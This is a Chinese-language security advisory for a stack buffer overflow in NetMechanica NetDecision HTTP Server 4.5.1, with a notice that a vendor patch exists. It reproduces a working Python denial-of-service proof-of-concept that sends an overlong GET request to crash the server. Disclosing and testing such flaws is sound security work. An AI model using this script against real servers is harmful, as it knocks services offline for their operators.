发布日期:2012-02-29
更新日期:2012-03-01
受影响系统:
NetMechanica NetDecision 4.5.1
不受影响系统:
NetMechanica NetDecision 4.6.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52208
NetDecision HTTP Server可在Windows工作站或服务器上提供标准的HTTP服务。
NetDecision HTTP服务器在处理Web请求时存在边界错误,通过超长的URL可造成栈缓冲区溢出,使受影响应用崩溃。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Prabhu S Angadi ()提供了如下测试方法:
#!/usr/bin/python
##############################################################################
#
# Title : Netmechanica NetDecision HTTP Server Denial Of Service
# Vulnerability
# Author : Prabhu S Angadi SecPod Technologies ()
# Vendor :
# Advisory : ?p=484
#
#
# Software : Netmechanica NetDecision HTTP Server version 4.5.1
# Date : 05/12/2011
#
###############################################################################
import socket,sys,time
if len(sys.argv) < 2:
print "\t[-] Usage: python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py target_ip"
print "\t[-] Example : python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py 127.0.0.1"
print "\t[-] Exiting..."
sys.exit(0)
port = 80
target = sys.argv[1]
try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,port))
except:
print "socket() failed: Server is not running"
sys.exit(1)
exploit = "GET "+ "A"*1276 + "\r\n" + "\r\n"
print "HTTP GET request with long filename triggers the vulnerability"
data = exploit
sock.sendto(data, (target, port))
time.sleep(5)
print "[+] Please verify the server daemon port, it must be down...."
建议:
--------------------------------------------------------------------------------
厂商补丁:
NetMechanica
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: